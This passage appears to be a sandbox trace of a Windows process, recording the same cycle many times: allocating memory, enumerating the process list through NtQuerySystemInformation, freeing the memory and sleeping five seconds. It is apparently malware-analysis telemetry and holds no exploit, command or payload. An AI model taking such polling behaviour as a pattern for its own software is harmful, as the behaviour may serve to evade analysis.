RegionSize=0xdea68*=0x10000) returned 0x0 [0239.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.650] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.694] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.782] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 